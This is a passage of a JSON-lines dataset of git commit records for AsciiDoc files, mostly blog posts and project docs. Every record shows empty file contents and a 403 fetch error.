2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21093eb56f83c063aa8a6cbd717828229db3e881","subject":"write(note): Add Editor's note","message":"write(note): Add Editor's note\n","repos":"charlenopires\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,genie88\/promises-book,genie88\/promises-book,cqricky\/promises-book,wenber\/promises-book,sunfurong\/promise,sunfurong\/promise,sunfurong\/promise,tangjinzhou\/promises-book,azu\/promises-book,oToUC\/promises-book,dieface\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,cqricky\/promises-book,mzbac\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,xifeiwu\/promises-book,purepennons\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,azu\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,wenber\/promises-book,mzbac\/promises-book,oToUC\/promises-book,azu\/promises-book,azu\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,xifeiwu\/promises-book","old_file":"Appendix-Note\/readme.adoc","new_file":"Appendix-Note\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3af4645064995ab4dfc150259edce3beb75e5b9","subject":"Update 2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","message":"Update 
2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc03d1959d5fc1eb6289ae19c1184ddd96238c2c","subject":"Deleted _posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Deleted _posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9241765ba26008cc6238d62bbb5f68d4c94f2201","subject":"CNV 10760 Corrections after initial changes failed QA testing","message":"CNV 10760 Corrections after initial changes failed QA testing\n\nCNV 10760 Changes following QE review 2\n\nCNV 10760 More QE Review 2 changes\n\nCNV 10760 Additional QE Review 2 changes\n\nCNV 10760 Additional Changes based on peer review\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/virt-attaching-vm-secondary-network-cli.adoc","new_file":"modules\/virt-attaching-vm-secondary-network-cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75a902e2d8e0a070368f440bdcb74f15935838c9","subject":"Update 2017-05-10-Episode-98-Clear-the-Field.adoc","message":"Update 2017-05-10-Episode-98-Clear-the-Field.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-10-Episode-98-Clear-the-Field.adoc","new_file":"_posts\/2017-05-10-Episode-98-Clear-the-Field.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a1929027a9fbfc7cb1f05582d06cf88d532df00","subject":"release notes","message":"release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d69b954d48281a2e52dafdaaff2b2a19602788e3","subject":"Update 2017-07-20-Alphaskades-Blog.adoc","message":"Update 2017-07-20-Alphaskades-Blog.adoc","repos":"alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io","old_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alphaskade\/alphaskade.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cabe1839aa62deb076b80c91d6352fa685e2e30c","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81c5efa8452464810110b27b823ebab61cf4d4ba","subject":"Create JDBCQueryMonitor.adoc","message":"Create JDBCQueryMonitor.adoc","repos":"tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JDBCQueryMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JDBCQueryMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"f6bd9c9dedbb5d0d3cac5d360c1aa98f45c019c7","subject":"y2b create post Xbox One Hands-on!","message":"y2b create post Xbox One Hands-on!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-14-Xbox-One-Handson.adoc","new_file":"_posts\/2013-11-14-Xbox-One-Handson.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c329ae222970d8551a057364c73c7321e9183f0c","subject":"Update 
2015-07-19-My-English-Title.adoc","message":"Update 2015-07-19-My-English-Title.adoc","repos":"chakbun\/chakbun.github.io,chakbun\/chakbun.github.io,chakbun\/chakbun.github.io","old_file":"_posts\/2015-07-19-My-English-Title.adoc","new_file":"_posts\/2015-07-19-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chakbun\/chakbun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8155eae5e13e88965492922108d1829b6a8deeab","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"038b8479718e1208cb04a09aa30cd618a66c9d97","subject":"y2b create post I Have A Problem...","message":"y2b create post I Have A Problem...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-21-I-Have-A-Problem.adoc","new_file":"_posts\/2017-01-21-I-Have-A-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"252cf762cc170cfad50d4e8da6544cafbda803b7","subject":"Update 2017-09-22-Yet-another-post.adoc","message":"Update 2017-09-22-Yet-another-post.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-22-Yet-another-post.adoc","new_file":"_posts\/2017-09-22-Yet-another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14dba634f95e99f5985c9ff82ffa5d1f3af1571","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce4ad8046ff9e653321743591d41da68c39e32d9","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d879bdee279de611f62f9b96e765d61056e66ac","subject":"Update 2019-01-14-bash-D-B.adoc","message":"Update 
2019-01-14-bash-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-14-bash-D-B.adoc","new_file":"_posts\/2019-01-14-bash-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e7e11bdd8e76396876b57f060feaf106f050f10","subject":"Update NOTES","message":"Update NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"018f52464524c03e20bcf553cb398930e69a4c3c","subject":"Welcome the GSoC students","message":"Welcome the GSoC students\n","repos":"hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/29\/hello-to-gsoc-students.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/29\/hello-to-gsoc-students.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba2dffc77082755ffe8982a20e5e9ed54ff733d4","subject":"Update 2016-12-07-User-Dashboard-Design-Review.adoc","message":"Update 2016-12-07-User-Dashboard-Design-Review.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-07-User-Dashboard-Design-Review.adoc","new_file":"_posts\/2016-12-07-User-Dashboard-Design-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20e51ca1ae25852b0b16118e5cf19602bd0011e7","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f02c3a4791faaf6ef1f960f17b42fa83106b81","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c9359c5c807a18534c4b2138bd7c91e45dc725b","subject":"Update 2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","message":"Update 2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","new_file":"_posts\/2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c094ada693b6fecb928dca0c7f301fb81f97f37","subject":"added kafka config","message":"added kafka config\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/user-guide\/publisher\/sme\/kafka-connector-configuration.adoc","new_file":"pages\/apim\/3.x\/user-guide\/publisher\/sme\/kafka-connector-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b28215cc91c2669162b75d3d4963f3c1755175af","subject":"Blog post for BTM 0.3.0.Final","message":"Blog post for BTM 
0.3.0.Final\n","repos":"jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/14\/hawkular-btm-0.3.0-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/14\/hawkular-btm-0.3.0-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"74d84d64c526bce49b9a127c7d9faf86db364410","subject":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","message":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"366305aad86eb5cb041db23d42323434f152dc45","subject":"Create messaging.asciidoc","message":"Create messaging.asciidoc","repos":"aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"messaging.asciidoc","new_file":"messaging.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"077318e9e2921679179c29da660e59b138d87992","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7a6d131bcbd5318e40e96e5d034bfdb4ca0e736a","subject":"Tip - get your work reviewed","message":"Tip - get your work reviewed\n","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do.adoc","new_file":"src\/do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ab340d10ffa20fd06d61c682c78cb16c9e124f8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-management-rest-api,gravitee-io\/gravitee-management-rest-api,gravitee-io\/gravitee-management-rest-api","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-management-rest-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f413230307cd7d119b0ac707022744f77694e2d","subject":"Update CONTRIBUTING.adoc","message":"Update CONTRIBUTING.adoc\n\nUpdate the Oomph instructions.","repos":"xiaoleiPENG\/my-project,shangyi0102\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot-concourse,brettwooldridge\/spring-boot,ihoneymon\/spring-boot,NetoDevel\/spring-boot,chrylis\/spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,jvz\/spring-boot,kamilszymanski\/spring-boot,afroje-reshma\/spring-boot-sample,ptahchiev\/spring-boot,philwebb\/spring-boot,kamilszymanski\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,lucassaldanha\/spring-boot,javyzheng\/spring-boot,htynkn\/spring-boot,SaravananParthasarathy\/SPSDemo,izeye\/spring-boot,kamilszymanski\/spring-boot,qerub\/spring-boot,nebhale\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,jayarampradhan\/spring-boot,donhuvy\/spring-boot,thomasdarimont\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,minmay\/spring-boot,candrews\/spring-boot,ollie314\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,candrews\/spring-boot,lucassaldanha\/spring-boot,i007422\/jenkins2-course-spring-boot,isopov\/spring-boot,sebastiankirsch\/spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,donhuvy\/spring-boot,cleverjava\/jenkins2-course-spring-boot,akmaharshi\/jenkins,jvz\/spring-boot,bijukunjummen\/spring-boot,spring-projects\/spring-boot,herau\/spring-boot,habuma\/spring-boot,aahlenst\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,drumonii\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot-concourse,bijukunjummen\/spring-boot,tsachev\/spring-boot,jxblum\/spring-boot,qerub\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,NetoDevel\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,pvorb\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,lexandro\/spring-boot,pvorb\/spring-boot,mdeinum\/spring-boot,joshthornhill\/spring-boot,i007422\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-bo
ot,joshiste\/spring-boot,DeezCashews\/spring-boot,Buzzardo\/spring-boot,mbogoevici\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,ollie314\/spring-boot,wilkinsona\/spring-boot,scottfrederick\/spring-boot,afroje-reshma\/spring-boot-sample,sbcoba\/spring-boot,lexandro\/spring-boot,RichardCSantana\/spring-boot,mosoft521\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,vpavic\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,yhj630520\/spring-boot,minmay\/spring-boot,linead\/spring-boot,ollie314\/spring-boot,joshthornhill\/spring-boot,akmaharshi\/jenkins,cleverjava\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,vpavic\/spring-boot,mosoft521\/spring-boot,xiaoleiPENG\/my-project,jvz\/spring-boot,thomasdarimont\/spring-boot,aahlenst\/spring-boot,DeezCashews\/spring-boot,jxblum\/spring-boot,kamilszymanski\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,jbovet\/spring-boot,minmay\/spring-boot,jmnarloch\/spring-boot,xiaoleiPENG\/my-project,Buzzardo\/spring-boot,yangdd1205\/spring-boot,jmnarloch\/spring-boot,jayarampradhan\/spring-boot,neo4j-contrib\/spring-boot,jxblum\/spring-boot,javyzheng\/spring-boot,bbrouwer\/spring-boot,yhj630520\/spring-boot,lexandro\/spring-boot,minmay\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,jayarampradhan\/spring-boot,joshiste\/spring-boot,jmnarloch\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,vakninr\/spring-boot,DeezCashews\/spring-boot,philwebb\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,joansmith\/spring-boot,NetoDevel\/spring-boot,jbovet\/spring-boot,tsachev\/spring-boot,bijukunjummen\/spring-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,deki\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring